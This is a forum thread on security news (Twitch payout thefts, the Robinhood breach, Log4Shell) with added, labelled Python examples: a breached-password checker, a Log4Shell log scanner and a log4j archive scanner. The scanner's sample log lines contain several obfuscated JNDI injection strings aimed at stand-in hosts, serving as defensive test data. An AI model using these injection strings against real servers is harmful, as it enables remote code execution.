
[Computer Security Thread] CVEs, or "Crap! Vulnerabilities! Eughhhhh..."


Posts

  • JaysonFour (Classy Monster Kitteh) Registered User regular
    edited October 2021
    In further Twitch news, apparently the hackers aren’t done yet:

    Twitch streamers are getting their payments from the site stolen.

    “Someone has gained access to my account, changed my pay-out from wire to PayPal and added their own PayPal,” Dakillzor explained.

    In a response to xSophieSophie, Twitch said “there is no recourse to reverse this transaction.” They also advised creating a new password and ensuring that two-factor authentication (2FA) is up to date. The streamer says 2FA was enabled, and still is, yet the payment method is still being changed.


    To me, this says they have a backdoor into the system somewhere, with administrator-level access to everything. The only way anybody’s going to trust them is to nuke the entirety of Twitch from orbit and rebuild it from scratch. At this point, I’d just go full red-alert and assume that everything was compromised, period, and nothing you submitted to Twitch is safe at this point.

    I can has cheezburger, yes?
  • TelMarine Registered User regular
    JaysonFour wrote: »
    In further Twitch news, apparently the hackers aren’t done yet:

    Twitch streamers are getting their payments from the site stolen.

    “Someone has gained access to my account, changed my pay-out from wire to PayPal and added their own PayPal,” Dakillzor explained.

    In a response to xSophieSophie, Twitch said “there is no recourse to reverse this transaction.” They also advised creating a new password and ensuring that two-factor authentication (2FA) is up to date. The streamer says 2FA was enabled, and still is, yet the payment method is still being changed.


    To me, this says they have a backdoor into the system somewhere, with administrator-level access to everything. The only way anybody’s going to trust them is to nuke the entirety of Twitch from orbit and rebuild it from scratch. At this point, I’d just go full red-alert and assume that everything was compromised, period, and nothing you submitted to Twitch is safe at this point.

    There are other plausible reasons. Perhaps they have some malware on their devices that steals session cookies or whatever equivalent, which would render password changing/two factor useless.

    3ds: 4983-4935-4575
  • V1m Registered User regular
    JaysonFour wrote: »
    In further Twitch news, apparently the hackers aren’t done yet:

    Twitch streamers are getting their payments from the site stolen.

    “Someone has gained access to my account, changed my pay-out from wire to PayPal and added their own PayPal,” Dakillzor explained.

    In a response to xSophieSophie, Twitch said “there is no recourse to reverse this transaction.” They also advised creating a new password and ensuring that two-factor authentication (2FA) is up to date. The streamer says 2FA was enabled, and still is, yet the payment method is still being changed.


    To me, this says they have a backdoor into the system somewhere, with administrator-level access to everything. The only way anybody’s going to trust them is to nuke the entirety of Twitch from orbit and rebuild it from scratch. At this point, I’d just go full red-alert and assume that everything was compromised, period, and nothing you submitted to Twitch is safe at this point.

    Do Twitch do business in the EU? Because my GDPR senses are tingling! This is definitely a GDPR 4 breach and they have not effectively remedied it.

  • TetraNitroCubane (The Djinnerator, At the bottom of a bottle) Registered User regular
    Given the extent of the breach, and what was taken from Twitch, the only safe move is to assume that the entire site is compromised.

    I would presume that this won't be the last we hear about an event like this.

  • Cantido Registered User regular
    So this Firewalla Gold fried my AT&T modem/router. That's fun....

    3DS Friendcode 5413-1311-3767
  • Shadowfire (Vermont, in the middle of nowhere) Registered User regular
    It doesn't have PoE, how did it put enough power out to fry an ISP's gateway?

    WiiU: Windrunner ; Guild Wars 2: Shadowfire.3940 ; PSN: Bradcopter
  • Cantido Registered User regular
    Fair enough. The modem was 3.5 years old and I had no issues until I tried to use the Firewalla.

    3DS Friendcode 5413-1311-3767
  • JaysonFour (Classy Monster Kitteh) Registered User regular
    Here we go again.

    Robinhood breached; 7 million people affected

    Robinhood said Monday that the popular trading app suffered a security breach last week where hackers accessed some personal information of roughly 7 million users then demanded a ransom payment.


    The online trading platform said it believes no Social Security numbers, bank account numbers or debit-card numbers were exposed and that customers have seen no financial losses because of the intrusion.

    The company on Twitter said the "attack has been contained."


    Pretty much they’re claiming the only thing the hackers got on most of those people are real names or email addresses… but honestly I’d still lock everything down. I think there’s another shoe to fall here.

    I can has cheezburger, yes?
  • Mugsley (Delaware) Registered User regular
    When the CEO was a young boy in Bulgaria, he didn't have to worry about cybersecurity.

  • Carpy Registered User regular
    Second, on November 2 we received a report to our security bug bounty program of a vulnerability that would allow an attacker to publish new versions of any npm package using an account without proper authorization. We quickly validated the report, began our incident response processes, and patched the vulnerability within six hours of receiving the report.

    So this was buried 9 paragraphs deep in a GitHub blog about their commitment to npm security. They claim there's no indication of it being used but they only have telemetry back to September 2020

  • Phoenix-D Registered User regular
  • Mugsley (Delaware) Registered User regular
    edited November 2021
    I'm SO FUCKING HAPPY I have to rely on my cable company to patch the cable router modem.

  • Shadowfire (Vermont, in the middle of nowhere) Registered User regular
    The affected list is all routers. The "modems" that are affected are gateways, so if you have a separate modem and router you should be in the clear.

    WiiU: Windrunner ; Guild Wars 2: Shadowfire.3940 ; PSN: Bradcopter
  • Mugsley (Delaware) Registered User regular
    I do, thank God. Now to patch my router...

  • Orca (Also known as Espressosaurus Wrex) Registered User regular
    edited November 2021
    Lol, Apple flagged my Discord password as compromised. Did they have a breach I missed?

  • LD50 Registered User regular
    Orca wrote: »
    Lol, Apple flagged my Discord password as compromised. Did they have a breach I missed?

    Probably not, instead your password probably matched the hash of a password that is in a database of passwords that have been compromised. You should probably change it.

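    The mechanism LD50 describes, a password matched against a database of breached hashes without the checker ever seeing the password, is usually done with a k-anonymity range query, the scheme used by Have I Been Pwned's Pwned Passwords API that many password managers rely on. The client hashes the password with SHA-1, sends only the first five hex digits, receives every leaked suffix under that prefix and finishes the comparison locally. Whether Apple's Keychain warning uses that exact service is not stated in the thread; it is an assumption made here for illustration. The script below is an added example, not code from the forum; its "range server" is a constructed in-memory table so it runs offline.

```python
"""Added example (not from the thread): a k-anonymity breached-password check."""
import hashlib
from typing import Dict, Iterable

# Constructed breach corpus standing in for a real leaked-password dataset.
# "password" appears twice to show that counts, not just presence, come back.
CONSTRUCTED_LEAKED_PASSWORDS = [
    "password", "password", "123456", "qwerty", "letmein", "hunter2",
]


def sha1_hex(password: str) -> str:
    """Uppercase hex SHA-1 of the UTF-8 password, the format range queries use."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def build_range_index(passwords: Iterable[str]) -> Dict[str, Dict[str, int]]:
    """Server-side index: {5-char prefix: {35-char suffix: times seen in breaches}}."""
    index: Dict[str, Dict[str, int]] = {}
    for pw in passwords:
        digest = sha1_hex(pw)
        bucket = index.setdefault(digest[:5], {})
        bucket[digest[5:]] = bucket.get(digest[5:], 0) + 1
    return index


def range_query(index: Dict[str, Dict[str, int]], prefix: str) -> Dict[str, int]:
    """Simulated server endpoint. It receives the prefix only; the response is
    every suffix sharing it, so the server cannot tell which one the client wants."""
    if len(prefix) != 5 or any(c not in "0123456789ABCDEF" for c in prefix.upper()):
        raise ValueError("prefix must be 5 hex characters")
    return dict(index.get(prefix.upper(), {}))


def breach_count(index: Dict[str, Dict[str, int]], password: str) -> int:
    """Client side: hash, send the prefix, match the suffix locally. Returns how
    many times the password appeared in the (constructed) breach corpus."""
    digest = sha1_hex(password)
    return range_query(index, digest[:5]).get(digest[5:], 0)


def is_compromised(index: Dict[str, Dict[str, int]], password: str) -> bool:
    return breach_count(index, password) > 0


if __name__ == "__main__":
    idx = build_range_index(CONSTRUCTED_LEAKED_PASSWORDS)
    for candidate in ["password", "correct horse battery staple"]:
        print(f"{candidate!r}: seen {breach_count(idx, candidate)} time(s)")
```

    The point worth noticing is in `range_query`: the only thing that crosses the trust boundary is a five-character prefix, which in a real corpus of hundreds of millions of hashes maps to several hundred candidates, so the service learns nothing useful about the password even if the query is logged.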
  • Orca (Also known as Espressosaurus Wrex) Registered User regular
    LD50 wrote: »
    Orca wrote: »
    Lol, Apple flagged my Discord password as compromised. Did they have a breach I missed?

    Probably not, instead your password probably matched the hash of a password that is in a database of passwords that have been compromised. You should probably change it.

    Already done, but I'm surprised to see it matched.

  • LostNinja Registered User regular
    Not sure if this is the best place to ask but it is semi-security related. Is there a way to circumvent the “Can’t connect securely to this page” web browser message resulting from a site using outdated TLS settings?

    I know it isn’t ideal, but I get it occasionally at work when trying to visit government sites that I need access to.

  • BahamutZERO Registered User regular
    Complain to your IT department probably

  • TetraNitroCubane (The Djinnerator, At the bottom of a bottle) Registered User regular
    edited December 2021
    I am not a netsec expert, but there is an emerging situation currently wherein a remote code execution vulnerability has been found in Log4j, a ubiquitous logging utility that is present in a wide range of software. The impact of this vulnerability is likely to be far reaching, particularly into web apps that have been long forgotten.
    Word of the vulnerability first came to light on sites catering to users of Minecraft, the best-selling game of all time. The sites warned that hackers could execute malicious code on servers or clients running the Java version of Minecraft by manipulating log messages, including from things typed in chat messages. The picture became more dire still as Log4j was identified as the source of the vulnerability, and exploit code was discovered posted online.
    “The Minecraft side seems like a perfect storm, but I suspect we are going to see affected applications and devices continue to be identified for a long time,” HD Moore, founder and CTO of network discovery platform Rumble, said. “This is a big deal for environments tied to older Java runtimes: Web front ends for various network appliances, older application environments using legacy APIs, and Minecraft servers, due to their dependency on older versions for mod compatibility.”

    Reports are already surfacing of servers performing Internet-wide scans in attempts to locate vulnerable servers.
    Log4j is incorporated into a host of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink. That means that a dizzying number of third-party apps may also be vulnerable to exploits of the same high severity as those threatening Minecraft users.

    One of the already deployed payloads?


    this log4shell payload is... a coin miner

    the vulnerability has arrived

    So, I'm not sure exactly how this isn't fiction but: A Java bug originally discovered in Minecraft has been exploited to hack a wide variety of web-facing applications, likely including smart TVs and fridges, and is being leveraged to mine cryptocurrency.

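    The post above describes the trigger: attacker-controlled text such as a chat message or a User-Agent header ends up in a log call, and Log4j expands a lookup like `${jndi:ldap://attacker/x}` inside it. The first detection rules that matched the literal string `${jndi:` were bypassed within hours using nested lookups (`${${lower:j}ndi:...}`, `${${::-j}${::-n}...}`) and URL encoding. The script below is an added example, not code from the thread: it URL-decodes each line, collapses the obfuscating lookups the way Log4j would resolve them, and only then looks for a JNDI lookup. The log lines are constructed; the addresses are documentation/reserved values, not real infrastructure.

```python
"""Added example (not from the thread): spotting Log4Shell lookup strings in logs."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Innermost ${...}: a lookup whose body contains no further braces or '$'.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A (de-obfuscated) JNDI lookup with its scheme, e.g. ${jndi:ldap://...}.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Resolve the lookups attackers use purely for obfuscation.
    Anything else (including the jndi lookup itself) is left untouched."""
    low = body.lower()
    if low.startswith("jndi:"):
        return body
    if ":-" in body:                      # ${env:NOPE:-j} or ${::-j} -> default value "j"
        return body.split(":-", 1)[1]
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    return body


def normalize_lookups(text: str, max_rounds: int = 25) -> str:
    """Repeatedly collapse innermost obfuscating lookups until the text is stable."""
    for _ in range(max_rounds):
        changed = False

        def repl(m: "re.Match[str]") -> str:
            nonlocal changed
            resolved = _resolve(m.group(1))
            if resolved == m.group(1):
                return m.group(0)          # keep ${...} intact (e.g. ${jndi:...}, ${sys:...})
            changed = True
            return resolved

        text = _INNERMOST.sub(repl, text)
        if not changed:
            break
    return text


def find_log4shell_indicator(line: str) -> Optional[Dict[str, object]]:
    """Return details if the line carries a JNDI lookup after decoding, else None."""
    normalized = normalize_lookups(unquote(line))
    m = _JNDI.search(normalized)
    if not m:
        return None
    return {
        "scheme": m.group(1).lower(),
        "disguised": normalized != line,   # URL-encoded and/or nested-lookup obfuscation
        "normalized": normalized,
    }


def scan_lines(lines: List[str]) -> List[Dict[str, object]]:
    hits: List[Dict[str, object]] = []
    for n, line in enumerate(lines, start=1):
        hit = find_log4shell_indicator(line)
        if hit:
            hit["line_no"] = n
            hits.append(hit)
    return hits


# Constructed sample: web access log lines plus two Minecraft-style server log lines.
SAMPLE_LOG_LINES = [
    '10.0.0.7 - - [10/Dec/2021:03:12:44 +0000] "GET /api/items HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:13:01 +0000] "GET / HTTP/1.1" 200 77 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:13:02 +0000] "GET / HTTP/1.1" 200 77 "-" "${${lower:j}ndi:${lower:r}mi://203.0.113.10:1099/x}"',
    '10.0.0.9 - - [10/Dec/2021:03:13:03 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fexfil.example%2Fa%7D HTTP/1.1" 404 12 "-" "curl/7.79"',
    '[03:14:10] [Server thread/INFO]: <Player> hi ${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.10/a}',
    '[03:14:11] [Server thread/INFO]: home is ${sys:user.home}',
]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {hit['line_no']}: jndi scheme={hit['scheme']} disguised={hit['disguised']}")
```

    Two things the plain `${jndi:` grep misses are covered here: the chat line that spells out `jndi` letter by letter through default-value lookups, and the URL-encoded probe in a query string. The last sample line, a harmless `${sys:...}` lookup, is left alone, which matters when the scanner runs over application logs that legitimately contain lookups.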
  • Carpy Registered User regular
    Twitter has excellently dubbed this vuln log4shell

  • Incenjucar (VChatter, Seattle, WA) Registered User regular
    Today was a good day to have put off figuring out how to implement L4J.

  • Jazz Registered User regular
    Guardian story: Recently uncovered software flaw ‘most critical vulnerability of the last decade’
    “The internet’s on fire right now,” said Adam Meyers, senior vice-president of intelligence at the cybersecurity firm Crowdstrike. “People are scrambling to patch”, he said, “and all kinds of people scrambling to exploit it.” He said on Friday morning that in the 12 hours since the bug’s existence was disclosed, it had been “fully weaponized”, meaning malefactors had developed and distributed tools to exploit it.

    The flaw, dubbed “Log4Shell”, may be the worst computer vulnerability discovered in years. It was uncovered in an open-source logging tool that is ubiquitous in cloud servers and enterprise software used across the industry and the government. Unless it is fixed, it grants criminals, spies and programming novices alike, easy access to internal networks where they can loot valuable data, plant malware, erase crucial information and much more.

    ...

    Amit Yoran, CEO of the cybersecurity firm Tenable, called it “the single biggest, most critical vulnerability of the last decade” – and possibly the biggest in the history of modern computing.

    The vulnerability was rated 10 on a scale of one to 10 by the Apache Software Foundation, which oversees development of the software. Anyone with the exploit can obtain full access to an unpatched computer that uses the software.

    Experts said the extreme ease with which the vulnerability lets an attacker access a web server – no password required – is what makes it so dangerous.

  • Mr_Rose (83 Blue Ridge Protects the Holy) Registered User regular
    So what sort of thing uses this log4 code? Like is this buried in my Steam account/client somewhere? Etc.

    ...because dragons are AWESOME! That's why.
    Nintendo Network ID: AzraelRose
    DropBox invite link - get 500MB extra free.
  • furlion (Riskbreaker, Lea Monde) Registered User regular
    Mr_Rose wrote: »
    So what sort of thing uses this log4 code? Like is this buried in my Steam account/client somewhere? Etc.

    From what I was reading on Reddit, it's basically everywhere. The library is pretty ubiquitous, and it's really just a matter of luck on whether any particular server used it.

    Gamertag: KL Retribution
    PSN:Furlion
  • TetraNitroCubane (The Djinnerator, At the bottom of a bottle) Registered User regular

    This log4j exploit = remote code execution in basically everything

    Arbitrary code execution in iCloud, Twitter, Steam, CloudFlare, Amazon, Tesla, Baidu, Tencent

    This may well be the most devastating 0day RCE exploit that has ever been dropped in all of history.

    We're going to be seeing some major fallout from this, right quick.

  • Orca (Also known as Espressosaurus Wrex) Registered User regular
    furlion wrote: »
    Mr_Rose wrote: »
    So what sort of thing uses this log4 code? Like is this buried in my Steam account/client somewhere? Etc.

    From what I was reading on Reddit, it's basically everywhere. The library is pretty ubiquitous, and it's really just a matter of luck on whether any particular server used it.

    Log4J is ubiquitous in Java. If you need logging, chances are Log4J is where you'll look first unless you have special needs.

    At this point, I'm afraid to run any Java app that talks to the internet on my local machine because my money is on it using log4j.

  • Carpy Registered User regular
    edited December 2021
    It's a really common Java logging library. Good chance any Java app uses it.

    Edit: d'oh, I'm super late.

  • LostNinja Registered User regular
    So what would be the fix for this? Is it something each individual platform will need to address separately?

  • Mostly Harmless Registered User regular
    edited December 2021
    LostNinja wrote: »
    So what would be the fix for this? Is it something each individual platform will need to address separately?

    Yep, each affected app needs to update its dependencies. Seems to only affect v2 of the library as well, so a lot of older/corporate apps have escaped.

    Still, feeling pretty cocky for having chosen Logback for our stack now :biggrin:

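    "Each affected app needs to update its dependencies" presupposes knowing where Log4j actually is, and in practice it was buried inside WAR and EAR files, vendor appliances and bundled JREs rather than declared in anyone's own build. The scanner below is an added example, not code from the thread or from the Log4j project: it walks a directory, opens every JAR/WAR/EAR/ZIP (recursing into archives nested inside archives), reads the Maven `pom.properties` that log4j-core and log4j 1.x ship with, and flags what it finds. CVE-2021-44228 affected log4j-core 2.0-beta9 through 2.14.1 and 2.15.0 was the first fix, with further releases in the following days; the 2.17.0 threshold is this example's policy choice, not something the thread states. The fixture archives are constructed in a temporary directory so the script runs offline.

```python
"""Added example (not from the thread): locate log4j-core inside archives on disk."""
import io
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS_2X = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
POM_PROPS_1X = "META-INF/maven/log4j/log4j/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
MIN_SAFE = (2, 17, 0)   # policy threshold chosen for this example, see lead-in


def parse_version(version: str) -> Optional[Tuple[int, int, int]]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); unparsable -> None."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def classify(version: Optional[str]) -> str:
    parsed = parse_version(version) if version else None
    if parsed is None:
        return "investigate: log4j artefact found but version unknown"
    if parsed[0] == 1:
        return "eol: log4j 1.x receives no fixes, migrate"
    if parsed < MIN_SAFE:
        return "update: log4j-core below threshold"
    return "ok"


def _version_from_pom(zf: zipfile.ZipFile, path: str) -> Optional[str]:
    for line in zf.read(path).decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def inspect_archive(blob: bytes, label: str, findings: List[Dict[str, object]]) -> None:
    """Record log4j evidence in one archive, then recurse into archives it contains."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        version = None
        for pom in (POM_PROPS_2X, POM_PROPS_1X):
            if pom in names:
                version = _version_from_pom(zf, pom)
                break
        has_jndi = JNDI_LOOKUP_CLASS in names
        if version is not None or has_jndi:
            findings.append({"archive": label, "version": version,
                             "jndi_lookup_present": has_jndi, "status": classify(version)})
        for inner in sorted(names):                      # WEB-INF/lib/*.jar and the like
            if inner.lower().endswith(ARCHIVE_SUFFIXES):
                inspect_archive(zf.read(inner), f"{label}!{inner}", findings)


def scan_tree(root: str) -> List[Dict[str, object]]:
    findings: List[Dict[str, object]] = []
    for dirpath, _, files in os.walk(root):
        for fn in sorted(files):
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as fh:
                    label = os.path.relpath(full, root).replace(os.sep, "/")
                    inspect_archive(fh.read(), label, findings)
    return findings


# ---- constructed fixtures standing in for real artefacts ----------------------
def _fake_log4j_core(version: str) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS_2X, f"version={version}\ngroupId=org.apache.logging.log4j\n")
        zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")   # placeholder class bytes
    return buf.getvalue()


def build_constructed_fixtures(root: str) -> None:
    with open(os.path.join(root, "app.jar"), "wb") as fh:
        fh.write(_fake_log4j_core("2.14.1"))
    with zipfile.ZipFile(os.path.join(root, "webapp.war"), "w") as war:
        war.writestr("WEB-INF/web.xml", "<web-app/>")
        war.writestr("WEB-INF/lib/log4j-core-2.16.0.jar", _fake_log4j_core("2.16.0"))
    with zipfile.ZipFile(os.path.join(root, "legacy.jar"), "w") as old:
        old.writestr(POM_PROPS_1X, "version=1.2.17\ngroupId=log4j\nartifactId=log4j\n")
    with zipfile.ZipFile(os.path.join(root, "other.jar"), "w") as other:
        other.writestr("com/example/Main.class", b"\xca\xfe\xba\xbe")


def demo() -> Dict[str, str]:
    """Build the fixtures in a temp dir, scan it, return {archive label: status}."""
    with tempfile.TemporaryDirectory() as root:
        build_constructed_fixtures(root)
        return {str(f["archive"]): str(f["status"]) for f in scan_tree(root)}


if __name__ == "__main__":
    for archive, status in demo().items():
        print(f"{archive}: {status}")
```

    The nested-archive recursion is the part that matters in practice: a `webapp.war` looks clean from the outside and only reveals its `log4j-core` once `WEB-INF/lib` is opened. Two caveats a real scan has to live with: a shaded or repackaged JAR may carry no `pom.properties` at all (hence the "investigate" status when only `JndiLookup.class` is found), and a JAR on disk says nothing about whether the process actually loads it.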
  • Nosf Registered User regular
    edited December 2021
    Updated my unifi controller this morning, think that's everything we have that we host. Everything else like Connectwise is hosted by them so uh, get to patchin' bitches.

    https://www.reddit.com/r/msp/comments/rdba36/critical_rce_vulnerability_is_affecting_java/

  • Orca (Also known as Espressosaurus Wrex) Registered User regular
    edited December 2021
    LostNinja wrote: »
    So what would be the fix for this? Is it something each individual platform will need to address separately?

    Yep, each affected app needs to update its dependencies. Seems to only affect v2 of the library as well, so a lot of older/corporate apps have escaped.

    Still, feeling pretty cocky for having chosen Logback for our stack now :biggrin:

    Apparently, the V1 is EOL so you're fucked with that and need to upgrade to V2

    So, you know, that's cool.

  • Mostly Harmless Registered User regular
    Orca wrote: »
    Apparently, the V1 is EOL so you're fucked with that and need to upgrade to V2

    Since when has that ever mattered in the enterprise? :cry: We still have some things running on Java 7...

  • Orca (Also known as Espressosaurus Wrex) Registered User regular
    Orca wrote: »
    Apparently, the V1 is EOL so you're fucked with that and need to upgrade to V2

    Since when has that ever mattered in the enterprise? :cry: We still have some things running on Java 7...

    RIP Mostly Harmless, they were mostly harmless

  • Nosf Registered User regular
    Found some instances. MS SQL for our Dynamics installs had it, but no Java install, so it appears to just be an included plug-in. Dell SupportAssist Enterprise, which is upgrading to some new product right now.

  • JaysonFour (Classy Monster Kitteh) Registered User regular
    So, a couple questions on this log4j thing:

    1) Is this something that home users need to worry about as far as patching anything on our machines? Is there anything we can do to avoid getting hit by this?

    2) Can we go on the net and play MMOs and access other sites and pretty much do whatever without our computers getting nailed by this, or something caused by this? Or is this a “better to stay offline until lots of patches for stuff finish migrating through the stuff you use” type of thing?

    3) How worried should we users be about getting our stuff hacked because of this?

    I can has cheezburger, yes?
  • furlion (Riskbreaker, Lea Monde) Registered User regular
    JaysonFour wrote: »
    So, a couple questions on this log4j thing:

    1) Is this something that home users need to worry about as far as patching anything on our machines? Is there anything we can do to avoid getting hit by this?

    2) Can we go on the net and play MMOs and access other sites and pretty much do whatever without our computers getting nailed by this, or something caused by this? Or is this a “better to stay offline until lots of patches for stuff finish migrating through the stuff you use” type of thing?

    3) How worried should we users be about getting our stuff hacked because of this?

    1) This is strictly for servers, so unless you are running a specific type of home server you are fine. Unfortunately, one of the servers you could be running is the Java version of Minecraft. You know, the most popular game of all time. Avoiding it is entirely up to the websites you access and services you use being patched as soon as possible. Nothing you can do.

    2) It is possible for someone to hack a server and use it to distribute malicious code. Apparently there are already exploits to do this floating around the internet. The problem is it could be literally any website/gaming service you connect to. Unless you want to go completely off the grid until this is all patched up you just have to deal with it as best you can. Basically look for the service/website to specifically state they have patched or use a different library.

    3) Since this can be used to gain complete control of any server running this library, all your data is basically up for grabs. They don't have to log into your account, they have your account and whatever information is stored with it. This is so bad they could take control of say Steam, push an update to the program that contains ransomware, and lock down the computers of everyone using it. I am not really sure how good antivirus software would work in such a situation.

    Gamertag: KL Retribution
    PSN:Furlion
  • JaysonFour (Classy Monster Kitteh) Registered User regular
    furlion wrote: »
    JaysonFour wrote: »
    So, a couple questions on this log4j thing:

    1) Is this something that home users need to worry about as far as patching anything on our machines? Is there anything we can do to avoid getting hit by this?

    2) Can we go on the net and play MMOs and access other sites and pretty much do whatever without our computers getting nailed by this, or something caused by this? Or is this a “better to stay offline until lots of patches for stuff finish migrating through the stuff you use” type of thing?

    3) How worried should we users be about getting our stuff hacked because of this?

    1) This is strictly for servers, so unless you are running a specific type of home server you are fine. Unfortunately, one of the servers you could be running is the Java version of Minecraft. You know, the most popular game of all time. Avoiding it is entirely up to the websites you access and services you use being patched as soon as possible. Nothing you can do.

    2) It is possible for someone to hack a server and use it to distribute malicious code. Apparently there are already exploits to do this floating around the internet. The problem is it could be literally any website/gaming service you connect to. Unless you want to go completely off the grid until this is all patched up you just have to deal with it as best you can. Basically look for the service/website to specifically state they have patched or use a different library.

    3) Since this can be used to gain complete control of any server running this library, all your data is basically up for grabs. They don't have to log into your account, they have your account and whatever information is stored with it. This is so bad they could take control of say Steam, push an update to the program that contains ransomware, and lock down the computers of everyone using it. I am not really sure how good antivirus software would work in such a situation.

    Well, that's just wonderful. Not mad about it, not anxious, just...

    I'm kind of staggered that something like this could still have happened, in this day and age. It's like the perfect storm of vulnerabilities- it's easy to utilize, it's in pretty much fucking everything, and stopping it requires the IT people of pretty much everything to be able to find and install a patch or new version of this Java stuff by app/server/etc... and of course there's also a lot of stuff that's never going to get updated because people are lazy or it's active but no longer supported... and then of course there's an onus on users to install the patches for the stuff they have to serverside.

    I'm just lucky I don't play Minecraft, I suppose. But god, all those poor IT people running on zero sleep and having to deal with and patch this and then deal with Patch Tuesday... I feel for them all. It's got to be hell for them.

    I got what I needed to done, so I'm just going to take it easy till Monday, I think. Let another 24-36 hours go for more patches to be pushed and hoping the patches beat the exploiters and this doesn't erupt into something much worse.

    I can has cheezburger, yes?
  • Bucketman (Call me Skragg) Registered User regular
    Yeah, so we were real busy at work yesterday. We all missed the news on this stuff. I read about it while going to bed last night. Alerted the rest of the team. I was out of the house all day today. Still crickets from the team, so when I got home I went actively searching our systems, pinged the team/my boss and... was told we should just make a post about it and send out an email to let users update their own stuff.

    Not feeling great about this!
